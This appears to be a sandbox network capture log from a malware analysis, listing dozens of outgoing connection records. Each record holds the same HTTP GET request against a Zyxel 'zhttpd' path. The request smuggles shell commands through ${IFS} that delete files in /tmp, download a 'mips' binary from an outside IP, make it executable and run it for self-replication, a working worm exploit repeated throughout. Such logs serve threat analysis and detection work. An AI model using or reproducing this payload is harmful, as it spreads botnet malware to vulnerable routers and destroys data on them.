                                        Mar 31, 2024 09:21:34.031227112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5208192.168.2.2349732128.71.131.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031279087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5209192.168.2.2347076156.207.232.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031313896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5210192.168.2.235338274.23.191.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031353951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5211192.168.2.2344950190.210.73.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031405926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5212192.168.2.234567683.196.201.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031465054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5213192.168.2.233662492.211.231.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031501055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5214192.168.2.2347130115.226.59.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031553984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5215192.168.2.235864676.113.170.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031609058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5216192.168.2.233596872.236.187.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031655073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5217192.168.2.2340494189.14.104.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031708002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5218192.168.2.233580248.245.81.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031744003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5219192.168.2.233992018.92.78.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031770945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5220192.168.2.2339612116.173.218.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031819105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5221192.168.2.233924460.219.95.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031867027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5222192.168.2.2355066139.220.250.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031914949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5223192.168.2.233615442.40.184.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031970978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5224192.168.2.2342074172.13.245.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032035112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5225192.168.2.2350138110.191.32.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032077074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5226192.168.2.2357804130.42.133.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032129049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5227192.168.2.2333734176.187.42.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032162905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5228192.168.2.234393862.180.77.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032207966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5229192.168.2.2345094220.66.237.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032260895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5230192.168.2.2337794182.90.5.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032304049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5231192.168.2.234344846.205.249.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032346010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5232192.168.2.23526564.51.89.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032392025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5233192.168.2.2344592222.158.122.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032438040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5234192.168.2.233875295.33.66.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032490015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5235192.168.2.234553060.132.34.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032536030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5236192.168.2.2353208156.34.90.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032577038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5237192.168.2.234885853.255.108.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032624006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5238192.168.2.2356486133.249.109.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032661915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5239192.168.2.2340112188.114.21.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032720089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5240192.168.2.233603835.132.39.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032758951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5241192.168.2.2335402131.115.1.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032774925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5242192.168.2.234325266.88.195.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032836914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5243192.168.2.2347860172.209.171.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032881021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5244192.168.2.2353894129.118.83.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032922983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5245192.168.2.235308285.228.205.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.032967091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5246192.168.2.23567948.161.15.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033009052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5247192.168.2.2333386114.9.94.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033051014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5248192.168.2.2358078103.23.145.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033091068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5249192.168.2.2353790123.28.188.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033138990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5250192.168.2.235660418.132.156.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033179045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5251192.168.2.234714295.93.40.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033225060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5252192.168.2.2359382109.65.156.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033272982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5253192.168.2.234909257.238.248.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033313990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5254192.168.2.2358578209.195.100.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033376932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5255192.168.2.235667823.114.75.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033421040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5256192.168.2.234292066.199.7.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033474922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5257192.168.2.2333116166.71.155.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033509016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5258192.168.2.2359394162.19.14.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033571959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5259192.168.2.235176476.236.128.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033610106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5260192.168.2.2353874119.167.78.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033653975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5261192.168.2.234771631.96.126.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033691883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5262192.168.2.2346442164.204.117.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033725023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5263192.168.2.235619252.13.53.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033768892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5264192.168.2.2341842220.232.49.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033807993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5265192.168.2.2333868209.35.12.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033855915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5266192.168.2.2360710118.108.95.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033891916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5267192.168.2.234244246.87.213.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033929110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5268192.168.2.2351900178.187.122.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.033979893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5269192.168.2.234566670.97.62.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034018040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5270192.168.2.233453013.224.183.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034094095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5271192.168.2.2350080147.77.251.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034127951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5272192.168.2.2343878156.76.13.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034177065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5273192.168.2.235790018.226.129.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034207106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5274192.168.2.2340878121.164.71.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.034264088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5275192.168.2.236077286.225.110.185443
                                        TimestampBytes transferredDirectionData
